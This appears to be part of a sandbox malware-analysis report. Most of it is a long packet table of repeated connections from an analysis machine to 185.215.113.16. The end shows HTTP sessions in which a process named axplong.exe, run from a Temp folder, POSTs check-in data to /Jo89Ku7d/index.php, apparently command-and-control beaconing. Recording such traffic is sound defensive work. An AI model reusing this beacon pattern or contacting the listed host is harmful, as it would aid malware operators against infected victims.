Sep 27, 2024 00:23:47.160511017 CEST	49986	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.160712957 CEST	49986	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.167603970 CEST	80	49986	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:47.866168022 CEST	80	49986	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:47.866451979 CEST	49986	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.977328062 CEST	49986	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.977627993 CEST	49987	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.984889030 CEST	80	49987	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:47.985548019 CEST	49987	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.985548019 CEST	49987	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.986814022 CEST	80	49986	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:47.988989115 CEST	49986	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.991995096 CEST	80	49987	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:48.722927094 CEST	80	49987	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:48.722985983 CEST	49987	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:48.727879047 CEST	49987	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:48.728384018 CEST	49988	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:48.734874010 CEST	80	49987	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:48.734925032 CEST	49987	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:48.735512018 CEST	80	49988	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:48.735584974 CEST	49988	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:48.736231089 CEST	49988	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:48.742974043 CEST	80	49988	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:49.518017054 CEST	80	49988	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:49.518090963 CEST	49988	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:49.634114027 CEST	49989	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:49.634135008 CEST	49988	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:49.641114950 CEST	80	49989	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:49.641522884 CEST	80	49988	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:49.644877911 CEST	49989	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:49.644887924 CEST	49988	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:49.645052910 CEST	49989	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:49.651700974 CEST	80	49989	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:50.345096111 CEST	80	49989	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:50.348900080 CEST	49989	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:50.351946115 CEST	49989	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:50.351946115 CEST	49990	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:50.358553886 CEST	80	49990	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:50.358843088 CEST	80	49989	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:50.360867023 CEST	49989	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:50.360867023 CEST	49990	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:50.361107111 CEST	49990	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:50.367407084 CEST	80	49990	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.084892988 CEST	80	49990	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.084950924 CEST	49990	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.197213888 CEST	49990	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.197804928 CEST	49991	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.202558994 CEST	80	49990	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.202608109 CEST	49990	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.202862978 CEST	80	49991	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.202925920 CEST	49991	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.203207016 CEST	49991	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.207962036 CEST	80	49991	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.902079105 CEST	80	49991	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.906203032 CEST	49991	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.935518980 CEST	49991	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.935854912 CEST	49992	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.942066908 CEST	80	49992	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.942318916 CEST	80	49991	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:51.943065882 CEST	49991	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.943075895 CEST	49992	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.948873997 CEST	49992	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:51.955317974 CEST	80	49992	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:52.665257931 CEST	80	49992	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:52.665318012 CEST	49992	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:52.774342060 CEST	49992	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:52.774707079 CEST	49993	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:52.779489040 CEST	80	49992	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:52.779540062 CEST	49992	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:52.779628992 CEST	80	49993	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:52.779700041 CEST	49993	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:52.779871941 CEST	49993	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:52.784780979 CEST	80	49993	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:53.499301910 CEST	80	49993	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:53.499423981 CEST	49993	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:53.503369093 CEST	49993	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:53.503825903 CEST	49994	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:53.508671999 CEST	80	49994	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:53.508749008 CEST	49994	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:53.508774996 CEST	80	49993	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:53.508877993 CEST	49993	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:53.508948088 CEST	49994	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:53.515964031 CEST	80	49994	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:54.235147953 CEST	80	49994	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:54.236908913 CEST	49994	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:54.359802961 CEST	49994	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:54.365411043 CEST	49995	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:54.367559910 CEST	80	49994	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:54.372286081 CEST	80	49995	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:54.372318983 CEST	49994	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:54.379975080 CEST	49995	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:54.395792007 CEST	49995	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:54.403023958 CEST	80	49995	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.098203897 CEST	80	49995	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.098262072 CEST	49995	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.102047920 CEST	49995	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.102535009 CEST	49996	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.109611988 CEST	80	49995	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.109672070 CEST	49995	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.109704971 CEST	80	49996	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.109781027 CEST	49996	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.110033035 CEST	49996	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.117048979 CEST	80	49996	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.807851076 CEST	80	49996	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.808888912 CEST	49996	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.914727926 CEST	49996	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.915330887 CEST	49997	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.921941996 CEST	80	49996	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.922245026 CEST	80	49997	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:55.924923897 CEST	49996	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.924932957 CEST	49997	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.925143003 CEST	49997	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:55.932235956 CEST	80	49997	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:56.664693117 CEST	80	49997	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:56.664757967 CEST	49997	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:56.668124914 CEST	49997	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:56.668481112 CEST	49998	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:56.675556898 CEST	80	49997	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:56.675574064 CEST	80	49998	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:56.675612926 CEST	49997	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:56.675652981 CEST	49998	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:56.675913095 CEST	49998	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:56.682723999 CEST	80	49998	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:57.674366951 CEST	80	49998	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:57.674575090 CEST	49998	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:57.675457954 CEST	80	49998	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:57.675573111 CEST	49998	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:57.792572975 CEST	49999	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:57.792577982 CEST	49998	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:57.799465895 CEST	80	49999	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:57.799595118 CEST	49999	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:57.799849033 CEST	80	49998	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:57.800002098 CEST	49998	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:57.802818060 CEST	49999	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:57.809613943 CEST	80	49999	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:58.599020004 CEST	80	49999	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:58.599076033 CEST	49999	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:58.602272034 CEST	49999	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:58.602732897 CEST	50000	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:58.609738111 CEST	80	50000	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:58.609762907 CEST	80	49999	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:58.609805107 CEST	50000	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:58.609832048 CEST	49999	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:58.610009909 CEST	50000	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:58.617082119 CEST	80	50000	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:59.351725101 CEST	80	50000	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:59.351775885 CEST	50000	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:59.463423014 CEST	50000	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:59.463970900 CEST	50001	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:59.469029903 CEST	80	50000	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:59.469062090 CEST	80	50001	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:59.469080925 CEST	50000	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:59.469145060 CEST	50001	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:59.469305038 CEST	50001	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:59.474169016 CEST	80	50001	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:00.170747995 CEST	80	50001	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:00.170877934 CEST	50001	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:00.173731089 CEST	50001	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:00.174823046 CEST	50002	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:00.181041956 CEST	80	50001	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:00.181901932 CEST	80	50002	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:00.182009935 CEST	50001	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:00.182010889 CEST	50002	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:00.182305098 CEST	50002	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:00.189301968 CEST	80	50002	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:00.917038918 CEST	80	50002	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:00.917105913 CEST	50002	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.099070072 CEST	50002	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.099765062 CEST	50003	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.106800079 CEST	80	50002	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:01.106853962 CEST	50002	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.107079983 CEST	80	50003	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:01.107134104 CEST	50003	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.128513098 CEST	50003	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.135380983 CEST	80	50003	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:01.805083990 CEST	80	50003	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:01.807002068 CEST	50003	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.810807943 CEST	50003	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.811239004 CEST	50004	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.816047907 CEST	80	50003	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:01.816279888 CEST	50003	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.816322088 CEST	80	50004	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:01.816433907 CEST	50004	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.816708088 CEST	50004	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:01.821508884 CEST	80	50004	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:02.516047955 CEST	80	50004	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:02.516271114 CEST	50004	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:02.658000946 CEST	50004	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:02.658374071 CEST	50005	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:02.664613962 CEST	80	50004	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:02.664665937 CEST	50004	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:02.664712906 CEST	80	50005	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:02.664863110 CEST	50005	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:02.665215969 CEST	50005	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:02.671667099 CEST	80	50005	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:03.393903017 CEST	80	50005	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:03.393980026 CEST	50005	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:03.466624022 CEST	50005	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:03.466927052 CEST	50006	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:03.473539114 CEST	80	50005	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:03.473596096 CEST	50005	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:03.473972082 CEST	80	50006	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:03.474034071 CEST	50006	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:03.484644890 CEST	50006	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:03.489456892 CEST	80	50006	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:04.177910089 CEST	80	50006	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:04.177989960 CEST	50006	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:04.290880919 CEST	50006	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:04.291296005 CEST	50007	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:04.298348904 CEST	80	50006	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:04.298417091 CEST	80	50007	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:04.298453093 CEST	50006	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:04.298717022 CEST	50007	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:04.300823927 CEST	50007	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:04.308023930 CEST	80	50007	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.018717051 CEST	80	50007	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.018781900 CEST	50007	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.022639036 CEST	50007	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.023032904 CEST	50008	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.028006077 CEST	80	50007	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.028064013 CEST	50007	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.028285027 CEST	80	50008	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.028362989 CEST	50008	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.028558969 CEST	50008	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.033535004 CEST	80	50008	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.723233938 CEST	80	50008	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.723370075 CEST	50008	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.868494987 CEST	50008	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.868519068 CEST	50009	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.873852968 CEST	80	50009	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.873955965 CEST	50009	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.874098063 CEST	80	50008	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:05.874583960 CEST	50008	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.874809027 CEST	50009	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:05.880001068 CEST	80	50009	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:06.575536966 CEST	80	50009	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:06.583148956 CEST	50009	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.145159960 CEST	50009	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.145548105 CEST	50010	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.153527975 CEST	80	50009	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:07.153585911 CEST	50009	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.153812885 CEST	80	50010	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:07.156866074 CEST	50010	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.157202005 CEST	50010	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.164189100 CEST	80	50010	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:07.882426977 CEST	80	50010	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:07.882636070 CEST	50010	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.992840052 CEST	50010	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:07.993206978 CEST	50011	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.000081062 CEST	80	50011	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:08.000158072 CEST	50011	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.000374079 CEST	50011	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.000421047 CEST	80	50010	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:08.000477076 CEST	50010	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.007236004 CEST	80	50011	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:08.748888969 CEST	80	50011	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:08.748991013 CEST	50011	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.751693010 CEST	50011	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.752151012 CEST	50012	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.759109974 CEST	80	50012	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:08.759361029 CEST	80	50011	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:08.759404898 CEST	50012	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.759582996 CEST	50011	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.759675026 CEST	50012	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:08.766648054 CEST	80	50012	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:09.477315903 CEST	80	50012	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:09.477443933 CEST	50012	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:09.586829901 CEST	50012	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:09.587373972 CEST	50013	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:09.594461918 CEST	80	50012	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:09.594547987 CEST	50012	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:09.595037937 CEST	80	50013	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:09.595129013 CEST	50013	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:09.595347881 CEST	50013	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:24:09.602323055 CEST	80	50013	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:10.303550959 CEST	80	50013	185.215.113.16	192.168.2.4
Sep 27, 2024 00:24:10.303613901 CEST	50013	80	192.168.2.4	185.215.113.16

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:12.233195066 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:12.940140009 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:13.022727966 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:13.256257057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:13.374079943 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:14.090639114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:14.091665983 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:14.354705095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
